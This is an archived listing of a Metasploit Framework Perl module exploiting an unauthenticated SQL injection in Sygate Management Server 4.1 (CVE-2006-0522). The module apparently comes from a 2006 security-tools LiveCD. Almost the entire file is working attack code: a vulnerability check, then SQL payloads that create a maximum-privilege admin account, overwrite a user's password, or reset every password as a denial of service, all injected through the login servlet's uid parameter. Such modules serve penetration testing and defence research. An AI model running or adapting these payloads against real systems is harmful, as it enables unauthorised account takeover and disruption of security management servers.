home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / sygate_policy_manager.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  6.4 KB  |  230 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. ##
  12. # Affected product : Sygate Management Server v4.1 (at least)
  13. #
  14. # Vulnerability    : SQL-Injection in login page
  15. # Required privs   : Network access to the admin interface (HTTP)
  16. # Impact           : Raw access to the database
  17. # Sample payload   : Create a valid admin account directly in the database  
  18. #
  19. # Editor status    : Official patch available
  20. # http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html
  21. #
  22. ##
  23.  
  24. package Msf::Exploit::sygate_policy_manager;
  25. use base "Msf::Exploit";
  26. use strict;
  27. use Pex::Text;
  28. use bytes;
  29. use vars qw{$HAS_SHA1};
  30.  
  31. BEGIN 
  32. {
  33.     $HAS_SHA1 = 0;
  34.     
  35.     if (eval('require Digest::SHA1')) {
  36.         eval('use Digest::SHA1 qw(sha1);');
  37.         $HAS_SHA1 = 1;
  38.     }    
  39. }
  40.  
  41. my $advanced = { };
  42.  
  43. my $info = {
  44.     'Name'     => 'Sygate Management Server SQL Injection',
  45.     'Version'  => '$Revision: 1.4 $',
  46.     'Authors'  => [ 'Nicob <nicob[at]nicob.net>' ],
  47.     'Arch'     => [ 'x86' ],
  48.     'OS'       => [ 'win32' ],
  49.     'Priv'     => 0,
  50.     'UserOpts' =>
  51.       {
  52.         'RHOST'    => [1, 'ADDR',   'The target address'],
  53.         'RPORT'    => [1, 'PORT',   'The target port', 80],
  54.         'VHOST'    => [0, 'DATA',   'The virtual host name of the server'],
  55.         'LOGIN'    => [0, 'LOGIN',  'The username to create/modify', 'reporting'],
  56.         'PASSWD'   => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'],
  57.         'SERVLET'  => [1, 'DATA',   'Full path of the servlet', '/servlet/Sygate.Servlet.login'],
  58.         'SSL'      => [0, 'BOOL',   'Use SSL'],
  59.       },
  60.  
  61.     'Description' => Pex::Text::Freeform(qq{
  62.         This module exploits a non authenticated SQL-Injection vulnerability in the
  63.         Sygate Management Server (now Symantec Policy Manager), in order to create a new
  64.         admin account or change the password of an existing one. Version 4.1 is known to be vulnerable.
  65.         Version 5 is not vulnerable.
  66. }),
  67.  
  68.     'Refs' =>
  69.       [
  70.         ['URL',   'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'],
  71.         ['CVE',   '2006-0522'],
  72.         ['OSVDB', '22883'],
  73.         ['BID',   '16452'],
  74.       ],
  75.  
  76.     'Targets' => 
  77.         [
  78.             ['Change a specific users password', 'change_user_passwd'],
  79.             ['Create a new administrative account', 'add_account'],
  80.             ['Reset all passwords (denial of service)', 'reset_all'],
  81.         ],
  82.     
  83.     'DefaultTarget' => 0,
  84.     
  85.     'Keys' => ['sygate'],
  86.  
  87.   };
  88.  
  89. sub new {
  90.     my $class = shift;
  91.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  92.     return($self);
  93. }
  94.  
  95. sub Check {
  96.     my $self = shift;
  97.     my $target_host    = $self->GetVar('RHOST');
  98.     my $vhost          = $self->VHost;
  99.     my $target_port    = $self->GetVar('RPORT');
  100.     my $servlet        = $self->GetVar('SERVLET');
  101.     
  102.     my $request =
  103.       "GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n".
  104.       "Accept: */*\r\n".
  105.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
  106.       "Host: $vhost:$target_port\r\n".
  107.       "Connection: Close\r\n".
  108.       "\r\n";
  109.  
  110.     my $s = Msf::Socket::Tcp->new(
  111.         'PeerAddr' => $target_host,
  112.         'PeerPort' => $target_port,
  113.         'SSL'      => $self->GetVar('SSL'),
  114.       );
  115.  
  116.     if ($s->IsError){
  117.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  118.         return $self->CheckCode('Connect');
  119.     }
  120.  
  121.     $self->PrintLine("[*] Establishing a connection to the target...");
  122.  
  123.     $s->Send($request);
  124.     my $results = $s->Recv(-1, 20);
  125.     $s->Close();
  126.     
  127.     if ($results =~ /HTTP\/1\..\s+200/) {
  128.  
  129.         $self->PrintLine("[*] Vulnerable server detected!");
  130.         return $self->CheckCode('Confirmed');
  131.         
  132.     } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) {
  133.  
  134.         $self->PrintLine("[*] The Sygate Policy Manager servlet was not found.");
  135.         return $self->CheckCode('Safe');
  136.     }
  137.  
  138.     $self->PrintLine("[*] Generic error...");
  139.     return $self->CheckCode('Generic');
  140. }
  141.  
  142. sub Exploit {
  143.     my $self = shift;
  144.     my $target_host    = $self->GetVar('RHOST');
  145.     my $vhost          = $self->VHost;
  146.     my $target_port    = $self->GetVar('RPORT');
  147.     my $servlet        = $self->GetVar('SERVLET');
  148.     my $login          = $self->GetVar('LOGIN');
  149.     my $passwd         = $self->GetVar('PASSWD');
  150.     my $target         = $self->Targets->[$self->GetVar('TARGET')];
  151.     
  152.     if (! $HAS_SHA1) {
  153.         $self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit");
  154.         return;
  155.     }
  156.  
  157.     # The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string
  158.     my $sha1 = sha1($login.$passwd);
  159.     $sha1 =~ s/./sprintf("%02x", ord($&))/ges;
  160.     $sha1 = "0x".uc($sha1);
  161.  
  162.     # Maximum level of privileges
  163.     my $privs = "255";
  164.  
  165.     
  166.     my %sqlpayloads = 
  167.     (
  168.         # Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-(
  169.         'add_account' => 
  170.             "insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,".
  171.             "AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ".
  172.             "values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)",
  173.  
  174.         # Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only !
  175.         'reset_all' =>
  176.             "update CMS35.Admin set Password=cast('AA' as varbinary)",
  177.     
  178.         # Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' !
  179.         'change_user_passwd' =>
  180.             "update CMS35.Admin set Password=$sha1 where LoginName='$login'",
  181.     );
  182.     
  183.     my $payload = $sqlpayloads{ $target->[1] };
  184.  
  185.     # Inject our payload
  186.     $servlet = $servlet."?uid=".Pex::Text::URLEncode("';$payload -- ")."&up=foo";
  187.  
  188.     my $request =
  189.       "GET $servlet HTTP/1.1\r\n".
  190.       "Accept: */*\r\n".
  191.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
  192.       "Host: $vhost:$target_port\r\n".
  193.       "Connection: Close\r\n".
  194.       "\r\n";
  195.  
  196.     my $s = Msf::Socket::Tcp->new(
  197.         'PeerAddr' => $target_host,
  198.         'PeerPort' => $target_port,
  199.         'SSL'      => $self->GetVar('SSL'),
  200.       );
  201.  
  202.     if ($s->IsError){
  203.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  204.         return;
  205.     }
  206.  
  207.     $self->PrintLine("[*] Establishing a connection to the target...");
  208.     $self->PrintLine(' ');
  209.     $s->Send($request);
  210.     my $results = $s->Recv(-1, 20);
  211.     
  212.     if ($results =~ /HTTP\/1\.. 200 OK/im) {
  213.         # Seems to be fine ;-)
  214.         $self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'");
  215.     } else {
  216.         $self->PrintLine("Doh ! Are you sure this server is vulnerable ?");
  217.     }
  218.  
  219.     $s->Close();
  220.     return;
  221. }
  222.  
  223. sub VHost {
  224.     my $self = shift;
  225.     my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
  226.     return $name;
  227. }
  228.  
  229. 1;
  230.